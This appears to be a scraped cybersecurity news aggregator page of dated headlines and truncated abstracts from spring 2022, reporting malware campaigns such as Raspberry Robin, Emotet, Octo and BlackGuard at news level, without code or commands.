Security researchers have noticed a malicious campaign that used Windows event logs to store malware, a technique that has not been previously documented publicly for attacks in the wild.BleepingComputer
May 7, 2022
Raspberry Robin spreads via removable USB devices Full Text
Abstract
Researchers discovered a new Windows malware, dubbed Raspberry Robin, with worm-like capabilities that spreads via removable USB devices. Cybersecurity researchers from Red Canary have spotted a new Windows malware, dubbed Raspberry Robin, with worm-like...Security Affairs
May 7, 2022
Malware campaign hides a shellcode into Windows event logs Full Text
Abstract
Experts spotted a malware campaign that is the first one using a technique of hiding a shellcode into Windows event logs. In February 2022 researchers from Kaspersky spotted a malicious campaign using a novel technique that consists of hiding the shellcode...Security Affairs
May 06, 2022
This New Fileless Malware Hides Shellcode in Windows Event Logs Full Text
Abstract
A new malicious campaign has been spotted taking advantage of Windows event logs to stash chunks of shellcode for the first time in the wild. "It allows the 'fileless' last stage trojan to be hidden from plain sight in the file system," Kaspersky researcher Denis Legezo said in a technical write-up published this week. The stealthy infection process, not attributed to a known actor, is believed to have commenced in September 2021 when the intended targets were lured into downloading compressed .RAR files containing Cobalt Strike and Silent Break . The adversary simulation software modules are then used as a launchpad to inject code into Windows system processes or trusted applications. Also notable is the use of anti-detection wrappers as part of the toolset, suggesting an attempt on the part of the operators to fly under the radar. One of the key methods is to keep encrypted shellcode containing the next-stage malware as 8KB pieces in event logs, a never-bThe Hacker News
May 6, 2022
Steer clear of fake premium mobile app unlockers Full Text
Abstract
The site offers “tweaked apps”, apparently available with a single click and requiring “no jailbreak, no root.” There’s an OnlyFans Premium, Netflix Premium, a Pokemon Go Spoofer Injector, and many more.Malwarebytes Labs
May 06, 2022
Researchers Warn of ‘Raspberry Robin’ Malware Spreading via External Drives Full Text
Abstract
Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities and is propagated by means of removable USB devices. Attributing the malware to a cluster named " Raspberry Robin ," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL." The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to technology and manufacturing sectors. Attack chains pertaining to Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder. The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive. This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for externThe Hacker News
May 6, 2022
NetDooka framework distributed via a pay-per-install (PPI) malware service Full Text
Abstract
Researchers discovered a sophisticated malware framework, dubbed NetDooka, distributed via a pay-per-install (PPI) malware service known as PrivateLoader. Trend Micro researchers uncovered a sophisticated malware framework dubbed NetDooka that is distributed...Security Affairs
May 05, 2022
New Raspberry Robin worm uses Windows Installer to drop malware Full Text
Abstract
Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads using external USB drives.BleepingComputer
May 05, 2022 <br {:=”” .fs-4=”” .fw-700=”” .lh-0=”” }=”” <p=”” style=”font-weight:500; margin:0px” markdown=”1”> New NetDooka malware spreads via poisoned search results Full Text
Abstract
A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device.BleepingComputer
May 04, 2022
Pixiv, DeviantArt artists hit by NFT job offers pushing malware Full Text
Abstract
Users on Pixiv, DeviantArt, and other creator-oriented online platforms report receiving multiple messages from people claiming to be from the "Cyberpunk Ape Executives" NFT project, with the main goal to infect artists' devices with information-stealing malware.BleepingComputer
May 03, 2022
Conti, REvil, LockBit ransomware bugs exploited to block encryption Full Text
Abstract
Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the table by finding exploits in the most common ransomware and malware being distributed today.BleepingComputer
May 2, 2022
Analysis on recent wiper attacks: examples and how wiper malware works Full Text
Abstract
In the last two months, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time.AT&T Cybersecurity
May 01, 2022
Open source ‘Package Analysis’ tool finds malicious npm, PyPI packages Full Text
Abstract
The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative has released its first prototype version of the 'Package Analysis' tool that aims to catch and counter malicious attacks on open source registries. the open source tool released on GitHub was able to identify over 200 malicious npm and PyPI packages.BleepingComputer
April 28, 2022
EmoCheck now detects new 64-bit versions of Emotet malware Full Text
Abstract
The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month.BleepingComputer
April 28, 2022
New RIG Exploit Kit Campaign Infecting Victims’ PCs with RedLine Stealer Full Text
Abstract
A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan. "When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server," Bitdefender said in a new report shared with The Hacker News. Most of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others. Exploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware. The primary infection method used by attackers to distribute exploit kits, in this case theThe Hacker News
April 28, 2022
New Bumblebee malware replaces Conti’s BazarLoader in cyberattacks Full Text
Abstract
A newly discovered malware loader called Bumblebee is likely the latest development of the Conti syndicate, designed to replace the BazarLoader backdoor used to deliver ransomware payloads.BleepingComputer
April 27, 2022
Package Planting: Are You Unknowingly Maintaining Poisoned Packages? Full Text
Abstract
Aqua’s Team Nautilus found a logical flaw in npm that allows threat actors to masquerade a malicious package as legitimate and trick unsuspecting developers into installing it.Aquasec
April 27, 2022
RIG Exploit Kit drops RedLine malware via Internet Explorer bug Full Text
Abstract
Threat analysts have uncovered yet another large-scale campaign delivering the RedLine stealer malware onto worldwide targets.BleepingComputer
April 26, 2022
Emotet malware now installs via PowerShell in Windows shortcut files Full Text
Abstract
The Emotet botnet is now using Windows shortcut files (.LNK) containing PowerShell commands to infect victims computers, moving away from Microsoft Office macros that are now disabled by default.BleepingComputer
April 26, 2022
Prynt Stealer: A Newly Discovered Threat Full Text
Abstract
Cybersecurity analysts have detected yet another info-stealer malware infection, named Prynt Stealer, offering powerful capabilities and extra keylogger and clipper modules. The developer of the stealer claims the recent version of the stealer is undetectable. Users are suggested to use a stro ... Read MoreCyware Alerts - Hacker News
April 25, 2022
Emotet malware infects users again after fixing broken installer Full Text
Abstract
The Emotet malware phishing campaign is up and running again after the threat actors fixed a bug preventing people from becoming infected when they opened malicious email attachments.BleepingComputer
April 25, 2022
The ink-stained trail of GOLDBACKDOOR Full Text
Abstract
Stairwell assesses with medium-high confidence that GOLDBACKDOOR is the successor of, or used in parallel with, the malware BLUELIGHT, attributed to APT37 / Ricochet Chollima.Stairwell
April 25, 2022
New BotenaGo Malware Variant Targeting Lilin Security Camera DVR Devices Full Text
Abstract
A new variant of an IoT botnet called BotenaGo has emerged in the wild, specifically singling out Lilin security camera DVR devices to infect them with Mirai malware. Dubbed " Lilin Scanner " by Nozomi Networks, the latest version is designed to exploit a two-year-old critical command injection vulnerability in the DVR firmware that was patched by the Taiwanese company in February 2020. BotenaGo , first documented in November 2021 by AT&T Alien Labs, is written in Golang and features over 30 exploits for known vulnerabilities in web servers, routers and other kinds of IoT devices. The botnet's source code has since been uploaded to GitHub, making it ripe for abuse by other criminal actors. "With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code," the researchers said this year. The new BotenaGo malware is the latest to exploit vulnerabilities in LilThe Hacker News
April 25, 2022
Defeating BazarLoader Anti-Analysis Techniques Full Text
Abstract
It employs two distinctive anti-analysis techniques. The first is API function hashing, a known trick to obfuscate which functions are called. The second is an opaque predicate, a technique used for control flow obfuscation.Palo Alto Networks
April 25, 2022
New powerful Prynt Stealer malware sells for just $100 per month Full Text
Abstract
Threat analysts have spotted yet another addition to the growing space of info-stealer malware infections, named Prynt Stealer, which offers powerful capabilities and extra keylogger and clipper modules.BleepingComputer
April 22, 2022
Emotet Revamp: New Payloads and 64-Bit Modules Full Text
Abstract
According to Kaspersky, Emotet infection has seen a ten-fold increase from February to March, going from 3,000 to 30,000 emails. It is switching to new payloads detected by fewer antivirus engines.Cyware Alerts - Hacker News
April 21, 2022
Hackers Sneak ‘More_Eggs’ Malware Into Resumes Sent to Corporate Hiring Managers Full Text
Abstract
A new set of phishing attacks delivering the more_eggs malware has been observed striking corporate hiring managers with bogus resumes as an infection vector, a year after potential candidates looking for work on LinkedIn were lured with weaponized job offers . "This year the more_eggs operation has flipped the social engineering script, targeting hiring managers with fake resumes instead of targeting jobseekers with fake job offers," eSentire's research and reporting lead, Keegan Keplinger, said in a statement . The Canadian cybersecurity company said it identified and disrupted four separate security incidents, three of which occurred at the end of March. Targeted entities include a U.S.-based aerospace company, an accounting business located in the U.K., a law firm, and a staffing agency, both based out of Canada. The malware, suspected to be the handiwork of a threat actor called Golden Chickens (aka Venom Spider ), is a stealthy, modular backdoor suite capableThe Hacker News
April 21, 2022
Freely-Distributed Ginzo Stealer Malware Pilfers Browser Data, Discord Tokens, and Crypto Wallets Full Text
Abstract
Ginzo stealer is obfuscated with ConfuserEx, resulting in error messages when trying to decompile the code. That is because the type initializer .cctor decrypts the actual code on the fly. It also initializes data required for string decryption.G-Data Security Blog
April 20, 2022
Inno Stealer - Fake Windows 11 Upgrade Spreads Infostealer Full Text
Abstract
The new infostealer malware targets various web browsers and crypto wallets such as Chrome, Brave, Comodo, Opera, Vivaldi, Edge, 360 Browser, GeroWallet, BraveWallet, and GuildWallet.Cyware Alerts - Hacker News
April 20, 2022
New BotenaGo variant specifically targets Lilin security camera DVR devices Full Text
Abstract
Researchers spotted a new variant of the BotenaGo botnet malware that is considered highly evasive and has a zero-detection rate. The BotenaGo botnet was first spotted in November 2021 by researchers at AT&T, the malicious code leverages...Security Affairs
April 19, 2022
New SolarMarker Variant with Improved Evasion Tactics Full Text
Abstract
SolarMarker operators were observed using signed files, obfuscated PowerShell scripts, large files, and impersonation of legitimate software installers to stay undetected.Cyware Alerts - Hacker News
April 19, 2022
New SolarMarker variant upgrades evasion abilities to avoid detection Full Text
Abstract
Researchers disclosed a new variant of the SolarMarker malware that implements new techniques to avoid detection. Cybersecurity researchers from Palo Alto Networks disclosed a new version of the SolarMarker malware that implements new features to avoid...Security Affairs
April 19, 2022
New stealthy BotenaGo malware variant targets DVR devices Full Text
Abstract
Threat analysts have spotted a new variant of the BotenaGo botnet malware, and it's the stealthiest seen so far, running undetected by any anti-virus engine.BleepingComputer
April 18, 2022
New SolarMarker Malware Variant Using Updated Techniques to Stay Under the Radar Full Text
Abstract
Cybersecurity researchers have disclosed a new version of the SolarMarker malware that packs in new improvements with the goal of updating its defense evasion abilities and staying under the radar. "The recent version demonstrated an evolution from Windows Portable Executables (EXE files) to working with Windows installer package files (MSI files)," Palo Alto Networks Unit 42 researchers said in a report published this month. "This campaign is still in development and going back to using executables files (EXE) as it did in its earlier versions." SolarMarker, also called Jupyter, leverages manipulated search engine optimization (SEO) tactics as its primary infection vector. It's known for its information stealing and backdoor features, enabling the attackers to steal data stored in web browsers and execute arbitrary commands retrieved from a remote server. In February 2022, the operators of SolarMarker were observed using stealthy Windows Registry trickThe Hacker News
April 18, 2022
Unofficial Windows 11 upgrade installs info-stealing malware Full Text
Abstract
Hackers are luring unsuspecting users with a fake Windows 11 upgrade that comes with malware that steals browser data and cryptocurrency wallets.BleepingComputer
April 18, 2022
New BotenaGo Variant Discovered by Nozomi Networks Labs Full Text
Abstract
Researchers from Nozomi Networks Labs discovered a new variant of the Golang-based BotenaGo malware that specifically targets vulnerabilities in Lilin security camera DVR devices.Security Boulevard
April 15, 2022
Pipedream, an extremely versatile malware toolkit, could be used for targeting power grids, refineries, and other ICS systems Full Text
Abstract
The United States government has issued an advisory for the malware toolkit dubbed Pipedream that cybercriminal groups could use to potentially target all critical infrastructure owners worldwide.ARS Technica
April 14, 2022
Windows 11 tool to add Google Play secretly installed malware Full Text
Abstract
A popular Windows 11 ToolBox script used to add the Google Play Store to the Android Subsystem has secretly infected users with malicious scripts, Chrome extensions, and potentially other malware.BleepingComputer
April 14, 2022
Hafnium’s New Malware Hides Behind Scheduled Tasks Full Text
Abstract
Microsoft linked the Chinese-backed Hafnium group to a defense evasion malware Tarrask used by cybercriminals to attain persistence on compromised Windows environments. Researchers uncovered a recent malicious activity wherein hackers abused an unpatched zero-day vulnerability for their initia ... Read MoreCyware Alerts - Hacker News
April 14, 2022
New ZingoStealer infostealer drops more malware, cryptominers Full Text
Abstract
A new information-stealing malware called ZingoStealer has been discovered with powerful data-stealing features and the ability to load additional payloads or mine Monero.BleepingComputer
April 13, 2022
Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers Full Text
Abstract
The Chinese-backed Hafnium hacking group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments. The threat actor is said to have targeted entities in the telecommunication, internet service provider and data services sectors from August 2021 to February 2022, expanding from the initial victimology patterns observed during its attacks exploiting the then zero-day flaws in Microsoft Exchange Servers in March 2021. Microsoft Threat Intelligence Center (MSTIC), which dubbed the defense evasion malware " Tarrask ," characterized it as a tool that creates "hidden" scheduled tasks on the system. "Scheduled task abuse is a very common method of persistence and defense evasion — and an enticing one, at that," the researchers said . Hafnium, while most notable for Exchange Server attacks, has since leveraged unpatched zero-day vulnerabilities as initial vectors to drop web shells and other malThe Hacker News
April 13, 2022
Fakecalls - An Unusual Twist to Banking Customer Support Frauds Full Text
Abstract
A new banking trojan called Fakecalls hijacks phone conversations between a potential victim and its bank customer support to steal files stored on devices. The trojan can play a pre-recorded message that mimics the ones often used by banks to greet customers seeking support. Experts suggest down ... Read MoreCyware Alerts - Hacker News
April 12, 2022
New Octo Banking Trojan Abuses Android Accessibility Features Full Text
Abstract
ThreatFabric stumbled across Octo, a rental banking trojan capable of gaining remote access to compromised devices. It is said to be a rebrand of a similar Android threat called ExobotCompact. The malicious apps acting as droppers are identified as Pocket Screencaster, Fast Cleaner 2021, Play Store ... Read MoreCyware Alerts - Hacker News
April 12, 2022
New META Stealer is Popular in the Underground Marketplaces Full Text
Abstract
A researcher unearthed a malspam campaign distributing the new META infostealer to steal passwords stored in browsers, including Google Chrome, Edge, and Firefox, as well as cryptocurrency wallets. META tampers with Windows Defender using PowerShell to exclude .exe files from scanning to avoid ... Read MoreCyware Alerts - Hacker News
April 12, 2022
Microsoft: New malware uses Windows bug to hide scheduled tasks Full Text
Abstract
Microsoft has discovered a new malware used by the Chinese-backed Hafnium hacking group to maintain persistence on compromised Windows systems by creating and hiding scheduled tasks.BleepingComputer
April 12, 2022
Industroyer2: Industroyer reloaded Full Text
Abstract
ESET researchers responded to a cyber-incident affecting an energy provider in Ukraine. The collaboration resulted in the discovery of a new variant of Industroyer malware named Industroyer2.ESET Security
April 11, 2022
Third npm protestware: ‘event-source-polyfill’ calls Russia out Full Text
Abstract
Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.BleepingComputer
April 11, 2022
Rise in npm protestware: another open source dev calls Russia out Full Text
Abstract
Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.BleepingComputer
April 11, 2022
FFDroider, a new information-stealing malware disguised as Telegram app Full Text
Abstract
Cybersecurity researchers spotted a new Windows information-stealing malware, named FFDroider, designed to steal credentials and cookies. Cybersecurity researchers from Zscaler ThreatLabz warn of a new information-stealing malware, named FFDroider,...Security Affairs
April 11, 2022
Qbot malware switches to new Windows Installer infection vector Full Text
Abstract
The Qbot botnet is now pushing malware payloads via phishing emails with password-protected ZIP archive attachments containing malicious MSI Windows Installer packages.BleepingComputer
April 11, 2022
Android banking malware intercepts calls to customer support Full Text
Abstract
A banking trojan for Android that researchers call Fakecalls comes with a powerful capability that enables it to take over calls to a bank's customer support number and connect the victim directly with the cybercriminals operating the malware.BleepingComputer
April 11, 2022
Fakecalls Banking Trojan Makes Fake Calls to Korean Bank Customers Full Text
Abstract
Fakecalls mimics the mobile apps of popular Korean banks, among them KB (Kookmin Bank) and KakaoBank. Curiously, in addition to the usual logos, the Trojan’s creators display the support numbers of the respective banks on the Fakecalls screen.Kaspersky Lab
April 11, 2022
Researchers warn of FFDroider and Lightning info-stealers targeting users in the wild Full Text
Abstract
Cybersecurity researchers are warning of two different information-stealing malware, named FFDroider and Lightning Stealer , that are capable of siphoning data and launching further attacks. "Designed to send stolen credentials and cookies to a Command & Control server, FFDroider disguises itself on victim's machines to look like the instant messaging application 'Telegram,'" Zscaler ThreatLabz researchers Avinash Kumar and Niraj Shivtarkar said in a report published last week. Information stealers, as the name implies, are equipped to harvest sensitive information from compromised machines, such as keystrokes, screenshots, files, saved passwords and cookies from web browsers, that are then transmitted to a remote attacker-controlled domain. FFDroider is distributed through cracked versions of installers and freeware with the primary objective of stealing cookies and credentials associated with popular social media and e-commerce platforms and usingThe Hacker News
April 10, 2022
New Meta information stealer distributed in malspam campaign Full Text
Abstract
Independent analyst Brand Duncan has spotted a malspam campaign delivering META, a new info-stealer malware that appears to be rising in popularity among cybercriminals.BleepingComputer
April 09, 2022
New Android banking malware remotely takes control of your device Full Text
Abstract
A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud.BleepingComputer
April 9, 2022
SharkBot Banking Trojan spreads through fake AV apps on Google Play Full Text
Abstract
Experts discovered malicious Android apps on the Google Play Store masqueraded as antivirus solutions spreading the SharkBot Trojan. Researchers from the Check Point Research (CPR) team discovered several malicious Android apps on the official Google...Security Affairs
April 08, 2022
Mirai malware now delivered using Spring4Shell exploits Full Text
Abstract
The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.BleepingComputer
April 07, 2022
New Octo Banking Trojan Spreading via Fake Apps on Google Play Store Full Text
Abstract
A number of rogue Android apps that have been cumulatively installed from the official Google Play Store more than 50,000 times are being used to target banks and other financial entities. The rental banking trojan, dubbed Octo , is said to be a rebrand of another Android malware called ExobotCompact, which, in turn, is a "lite" replacement for its Exobot predecessor, Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News. Exobot is also likely said to have paved the way for a separate descendant called Coper, that was initially discovered targeting Colombian users around July 2021, with newer infections targeting Android users in different European Countries. "Coper malware apps are modular in design and include a multi-stage infection method and many defensive tactics to survive removal attempts," Cybersecurity company Cyble noted in an analysis of the malware last month. Like other Android banking trojans, the rogue appsThe Hacker News
April 7, 2022
The Mysterious Borat RAT is an All-In-One Threat Full Text
Abstract
Cyble discovered a new RAT, dubbed Borat. With a builder, feature modules, and a server certificate, it offers ransomware and DDOS attack services. It is not known whether Borat is being sold or freely shared among cybercriminals. While analyzing the campaign and digging into its origin, a res ... Read MoreCyware Alerts - Hacker News
April 07, 2022
First Malware Targeting AWS Lambda Serverless Platform Discovered Full Text
Abstract
A first-of-its-kind malware targeting Amazon Web Services' (AWS) Lambda serverless computing platform has been discovered in the wild. Dubbed "Denonia" after the name of the domain it communicates with, "the malware uses newer address resolution techniques for command and control traffic to evade typical detection measures and virtual network access controls," Cado Labs researcher Matt Muir said . The artifact analyzed by the cybersecurity company was uploaded to the VirusTotal database on February 25, 2022, sporting the name "python" and packaged as a 64-bit ELF executable. However, the filename is a misnomer, as Denonia is programmed in Go and harbors a customized variant of the XMRig cryptocurrency mining software. That said, the mode of initial access is unknown, although it's suspected it may have involved the compromise of AWS Access and Secret Keys. Another notable feature of the malware is its use of DNS over HTTPS ( DoH ) for cThe Hacker News
April 7, 2022
Colibri Loader employs clever persistence mechanism Full Text
Abstract
Recently discovered malware loader Colibri leverages a trivial and efficient persistence mechanism to deploy Windows Vidar data stealer. Malwarebytes researchers observed a new loader, dubbed Colibri, which has been used to deploy a Windows information...Security Affairs
April 7, 2022
MacOS Malware: Myth vs. Truth – Podcast Full Text
Abstract
Huntress Labs R&D Director Jamie Levy busts the old “Macs don’t get viruses” myth and offers tips on how MacOS malware differs and how to protect against it.Threatpost
April 07, 2022
New malware targets serverless AWS Lambda with cryptominers Full Text
Abstract
Security researchers have discovered the first malware specifically developed to target Amazon Web Services (AWS) Lambda cloud environments with cryptominers.BleepingComputer
April 7, 2022
Beastmode Powered With Newly Added Exploits Full Text
Abstract
A Mirai variant called Beastmode was found exploiting disclosed vulnerabilities in TOTOLINK routers. Attackers abused five new exploits within a month. Beastmode has also added some older bugs for a variety of routers from different vendors, all rated 9.8 on the CVSS scale. TOTOLINK device users ar ... Read MoreCyware Alerts - Hacker News
April 07, 2022
SharkBot Banking Trojan Resurfaces On Google Play Store Hidden Behind 7 New Apps Full Text
Abstract
As many as seven malicious Android apps discovered on the Google Play Store masqueraded as antivirus solutions to deploy a banking trojan called SharkBot . "SharkBot steals credentials and banking information," Check Point researchers Alex Shamshur and Raman Ladutska said in a report shared with The Hacker News. "This malware implements a geofencing feature and evasion techniques, which makes it stand out from the rest of malwares." Particularly, the malware is designed to ignore users from China, India, Romania, Russia, Ukraine, and Belarus. The rogue apps are said to have been installed more than 15,000 times prior to their removal, with most of the victims located in Italy and the U.K. The report complements previous findings from NCC Group, which found the bankbot posing as antivirus apps to carry out unauthorized transactions via Automatic Transfer Systems (ATS). SharkBot takes advantage of Android's Accessibility Services permissions to presentThe Hacker News
April 07, 2022
Malicious web redirect service infects 16,500 sites to push malware Full Text
Abstract
A new TDS (Traffic Direction System) operation called Parrot has emerged in the wild, having already infected servers hosting 16,500 websites of universities, local governments, adult content platforms, and personal blogs.BleepingComputer
April 07, 2022
Researchers Uncover How Colibri Malware Stays Persistent on Hacked Systems Full Text
Abstract
Cybersecurity researchers have detailed a "simple but efficient" persistence mechanism adopted by a relatively nascent malware loader called Colibri , which has been observed deploying a Windows information stealer known as Vidar as part of a new campaign. "The attack starts with a malicious Word document deploying a Colibri bot that then delivers the Vidar Stealer," Malwarebytes Labs said in an analysis. "The document contacts a remote server at (securetunnel[.]co) to load a remote template named 'trkal0.dot' that contacts a malicious macro," the researchers added. First documented by FR3D.HK and Indian cybersecurity company CloudSEK earlier this year, Colibri is a malware-as-a-service (MaaS) platform that's engineered to drop additional payloads onto compromised systems. Early signs of the loader appeared on Russian underground forums in August 2021. "This loader has multiple techniques that help avoid detection," CloudSEK rThe Hacker News
April 07, 2022
Android apps with 45 million installs used data harvesting SDK Full Text
Abstract
Mobile malware analysts warn about a set of applications available on the Google Play Store, which collected sensitive user data from over 45 million devices.BleepingComputer
April 6, 2022
New Denonia Malware Targets AWS Lambda Environments Full Text
Abstract
Lambda is a scalable compute service offered by Amazon Web Services (AWS) for running code, server and OS maintenance, capacity provisioning, logging, and operating numerous backend services.ZDNet
April 06, 2022
New FFDroider malware steals Facebook, Instagram, Twitter accounts Full Text
Abstract
A new information stealer named FFDroider has emerged, stealing credentials and cookies stored in browsers to hijack victims' social media accounts.BleepingComputer
April 06, 2022
Hackers Distributing Fake Shopping Apps to Steal Banking Data of Malaysian Users Full Text
Abstract
Threat actors have been distributing malicious applications under the guise of seemingly harmless shopping apps to target customers of eight Malaysian banks since at least November 2021. The attacks involved setting up fraudulent but legitimate-looking websites to trick users into downloading the apps, Slovak cybersecurity firm ESET said in a report shared with The Hacker News. The copycat websites impersonated cleaning services such as Maid4u, Grabmaid, Maria's Cleaning, Maid4u, YourMaid, Maideasy and MaidACall and a pet store named PetsMore, all of which are aimed at users in Malaysia. "The threat actors use these fake e-shop applications to phish for banking credentials," ESET said . "The apps also forward all SMS messages received by the victim to the malware operators in case they contain 2FA codes sent by the bank." The targeted banks include Maybank, Affin Bank, Public Bank Berhad, CIMB bank, BSN, RHB, Bank Islam Malaysia, and Hong Leong Bank. ThThe Hacker News
April 6, 2022
Fake Android Shopping Applications Steal Bank Account Logins, 2FA Codes Full Text
Abstract
On Wednesday, ESET's cybersecurity team published new research documenting three separate fake apps targeting customers who belong to eight Malaysian banks to steal their account logins.ZDNet
April 5, 2022
AsyncRAT campaigns feature new version of 3LOSH crypter Full Text
Abstract
The threat actor(s) behind these campaigns have been using 3LOSH to generate the obfuscated code responsible for the initial infection process. The same operator is likely distributing a variety of commodity RATs, such as AsyncRAT and LimeRAT.Cisco Talos
April 5, 2022
Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload Full Text
Abstract
SocGholish has been around longer than BLISTER, having already established itself well among threat actors for its advanced delivery framework. Reports show that its framework of attack has previously been used by threat actors from as early as 2020.Trend Micro
April 04, 2022
WhatsApp voice message phishing emails push info-stealing malware Full Text
Abstract
A new WhatsApp phishing campaign impersonating WhatsApp's voice message feature has been discovered, attempting to spread information-stealing malware to at least 27,655 email addresses.BleepingComputer
April 04, 2022
Experts Shed Light on BlackGuard Infostealer Malware Sold on Russian Hacking Forums Full Text
Abstract
A previously undocumented "sophisticated" information-stealing malware named BlackGuard is being advertised for sale on Russian underground forums for a monthly subscription of $200. "BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients," Zscaler ThreatLabz researchers Mitesh Wani and Kaivalya Khursale said in a report published last week. Also sold for a lifetime price of $700, BlackGuard is designed as a .NET-based malware that's actively under development, boasting of a number of anti-analysis, anti-debugging, and anti-evasion features that allows it to kill processes related to antivirus engines and bypass string-based detection. What's more, it checks the IP address of the infected devices by sending a request to the domain "https://ipwhois[.]app/xml/," and exit itself if the country is one among the Commonwealth of IndepThe Hacker News
April 4, 2022
Borat RAT, a new RAT that performs ransomware and DDoS attacks Full Text
Abstract
Cyble researchers discovered a new remote access trojan (RAT) named Borat capable of conducting DDoS and ransomware attacks. Researchers from threat intelligence firm Cyble discovered a new RAT, named Borat, that enables operators to gain full access...Security Affairs
April 03, 2022
New Borat remote access malware is no laughing matter Full Text
Abstract
A new remote access trojan (RAT) named Borat has appeared on darknet markets, offering easy-to-use features to conduct DDoS attacks, UAC bypass, and ransomware deployment.BleepingComputer
April 2, 2022
WordPress Popunder Malware Redirects to Scam Sites Full Text
Abstract
The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines in an attempt to stay hidden.Security Boulevard
April 01, 2022
Newly found Android malware records audio, tracks your location Full Text
Abstract
A previously unknown Android malware uses the same shared-hosting infrastructure previously seen used by the Russian APT group known as Turla, though attribution to the hacking group not possible.BleepingComputer
April 1, 2022
Verblecon: A New Advanced Malware Loader Full Text
Abstract
A threat actor was spotted employing a sophisticated crypto-mining malware, dubbed Verblecon, on systems to steal access tokens for Discord chat app users. There are reports that connect a Verblecon domain to a ransomware attack as well. Organizations are recommended to use up-to-date and reli ... Read MoreCyware Alerts - Hacker News
April 1, 2022
AcidRain, a wiper that crippled routers and modems in Europe Full Text
Abstract
Researchers spotted a new destructive wiper, tracked as AcidRain, that is likely linked to the recent attack against Viasat. Security researchers at SentinelLabs have spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers...Security Affairs
March 31, 2022
New BlackGuard password-stealing malware sold on hacker forums Full Text
Abstract
A new information-stealing malware named BlackGuard is winning the attention of the cybercrime community, now sold on numerous darknet markets and forums for a lifetime price of $700 or a subscription of $200 per month.BleepingComputer
March 31, 2022
Bad OPSEC allowed researchers to uncover Mars stealer operation Full Text
Abstract
The Morphisec Labs researchers analyzed a new malware, tracked as Mars stealer, which is based on the older Oski Stealer. Morphisec Labs recently discovered the Mars stealer that was spreading masqueraded as malicious software cracks and keygens. The...Security Affairs
March 30, 2022
Crypto Stealing Malware Spreads via Fake Wallet Apps Full Text
Abstract
Researchers found dozens of trojanized cryptocurrency wallet apps attempting to steal cryptocurrency funds, especially from Chinese users. ESET researchers have revealed over 40 copycat websites of popular cryptocurrency wallets. Smartphone users are suggested to stay vigilant and use genuine ... Read MoreCyware Alerts - Hacker News
March 29, 2022
Mars Stealer malware pushed via OpenOffice ads on Google Full Text
Abstract
A newly launched information-stealing malware variant called Mars Stealer is rising in popularity, and threat analysts are now spotting the first notable large-scale campaigns employing it.BleepingComputer
March 29, 2022
New JSSLoader Variant Uses XLL Files to Evade Detection Full Text
Abstract
A new wave of JSSLoader infections, operated by the FIN7 threat group, was observed using XLL files to deliver the malware via malicious Microsoft Excel add-ins. The latest variant comes with some new layers of obfuscation to keep itself hidden from security analysts. Organizations need to have int ... Read MoreCyware Alerts - Hacker News
March 29, 2022
New Malware Loader ‘Verblecon’ Infects Hacked PCs with Cryptocurrency Miners Full Text
Abstract
An unidentified threat actor has been observed employing a "complex and powerful" malware loader with the ultimate objective of deploying cryptocurrency miners on compromised systems and potentially facilitating the theft of Discord tokens. "The evidence found on victim networks appears to indicate that the goal of the attacker was to install cryptocurrency mining software on victim machines," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News. "This would appear to be a relatively low-reward goal for the attacker given the level of effort that would have been required to develop this sophisticated malware." This advanced piece of malware, dubbed Verblecon, is said to have been first spotted two months ago in January 2022, with the payload incorporating polymorphic qualities to evade signature-based detections by security software. In addition, the loader carries out further aThe Hacker News
March 29, 2022
Experts Detail Virtual Machine Used by Wslink Malware Loader for Obfuscation Full Text
Abstract
